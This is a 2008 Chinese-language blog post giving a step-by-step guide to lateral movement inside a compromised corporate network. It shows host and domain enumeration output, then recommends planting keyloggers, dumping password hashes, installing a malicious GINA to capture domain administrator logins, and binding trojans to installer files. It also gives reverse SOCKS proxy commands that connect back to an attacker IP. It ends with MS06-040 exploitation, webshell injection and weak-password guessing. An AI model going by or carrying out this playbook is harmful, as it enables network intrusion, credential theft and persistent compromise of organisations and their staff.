内网渗透的常用手法

    [多云 July 10, 2008 09:19 | by !4p47hy ]
内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口。很多时候我们直接从外网入手,随着安全的不断加固,已变得越来越困难。那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手法,关于如何获得内网机器,请查找我以前的一篇文章《内网渗透---如何打开突破口》。

渗透的过程就是一个信息刺探、利用、思考、突破的过程。首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探。

一.信息刺探

1. 当前机器的人物身份,当前控制的这台机器人物是一个什么样的身份,客服、销售人员还是开发人员,还是管理员。客服会做些什么,会通过什么方式跟其它人联系;开发人员在开发什么,应该会跟管理员联系,也会有一定的外网管理权限和内网测试服务器,这种情况下内网测试服务器是可以搞定的。如果是客服机器或是销售人员机器呢,他一定有整个公司或是网络的联系方式,自己发挥想象去。是管理员机器的话就不用说。
2. 当前网络结构的分析,是域结构,还是划分vlan的结构,大多数大型网络是域结构。一般外网的服务器都是有硬件防火墙的,并且指定内网的某些机器的mac才可以连接。所以我们先看看内网情况:
   C:\WINNT\system32>net view
伺服器名稱            說明

-------------------------------------------------------------------------------
\\2007ACC                                                                      
\\ABS-XP                                                                      
\\ACER-TS250           NAS 4BAY SATA                                          
\\ACER-TS500           NAS 4BAY SATA                                          
\\ACER6100                                                                    
\\AKIRA-WU             akira-wu                                                
\\ALICECHEN                                                                    
\\AMYCHIU                                                                      
\\ANDY2007                                                                    
\\ANDYTEST01                                                                  
\\ANNHUANG                                                                    
\\ANNIEKUO                                                                    
\\APOLLO                                                                      
\\APOPO                                                                        
\\ARTSERVER                                                                    
\\AUGTCHIEN                                                                    
\\AVSERVER                                                                    
\\BENLEE01                                                                    
\\BENSON-NB    

先用net view查看内网的情况,列出的机器就是在网络结构中有联系的机器,但不一定都在一个网段,所以ping出这些机器的ip,以便分析大概有哪些网段.
3.了解本机在网络中所占的角色
先ipconfig /all看下是否在域中,如图:

Highslide JS


从上图,我们可以得知,存在一个域xxxx,从内网ip来看,应该还存在很多个段,内网很大。我们ping 一下域xxxx,得到域服务器的ip.

我们再来看一下本机在域里面的角色,如图:

Highslide JS


看来只是一个普通域用户.我们再来查看一下域里面的用户.如图:

Highslide JS


域里面的用户很多,那么我们再查看一下域管理员有哪些:

Highslide JS


从上面我们掌握了内网的大概信息。下面我们进一步利用这些信息。

二.信息的利用:

1. 首先是内网占据的这台机器,要做几个必要的措施:1)种键盘记录,记录其可能登录的密码,有用的。2)抓hash跑密码,主要查看密码规则是否有规律,它的密码也可以去试下其它机器的密码,看是否通用。3)种gina,这一步主要不是记录当前用户的密码,而是为了来记录域管理员的登录密码,因为域管理员是有权限登录下面每台用户的机器的,gina是可以记到的,记到域管理密码后,内网在域中的机器就可以全部控制了。4)给占据机器上的备用安装文件或是备用驱动上绑马,此是为了防止对方重装机器,马就掉了。
2. 反弹socks代理。
在内网渗透中,反弹socks代理是很必要的,大家都知道用lcx来转发端口,好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其它机器,我们不可能一个一个的去中转端口连接,在当前控制的机器上开代理也没办法,因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明白。
首先在本机监听:
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......

此命令是将连接进来的53端口的数据包连接到1180端口。

在对方机器上运行:
C:\RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!

上面的x.x.x.x为你的外网ip,下面为你接收到反弹回来的代理显示的情况。
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......
[+] Recv Main Command Echo ok!
[+] Send Main Command Echo ok!
[+] Recv Main Command Echo again ok!
[+] Get a MainSocket on port 53 from x.x.x.x ......
[+] Waiting Client on Socks5 Agent Port:1180....


上面ok了,接下来在你本机安装sockscap,照下图设置就ok了。

Highslide JS


Highslide JS


Sockscap设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去试密码或是登录管理,也可以用mssql连接内网的1433,尝试sa弱口令等。总之反弹socks是你利用已控制的内网机器通向内网其它机器的一道桥梁。

三.思考

   信息有了,通道有了,接下来我们怎么做?
1. 内网溢出,通过对内网的扫描情况,判断win2000的机器,利用ms06040进行运程溢出。
2. 内网web,通过内网的扫描,用sockscap上的ie来打开内网开放的web,在内网采用web注入或上传的方式来获取webshell提权。
3. 内网弱口令试探,利用ipc,或是3389,和已掌握的密码信息来尝试猜解内网nt的密码,当然这需要耐心,也是非常有用的。
Technology | Comments(0) | Trackbacks(0) | Reads(7854)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive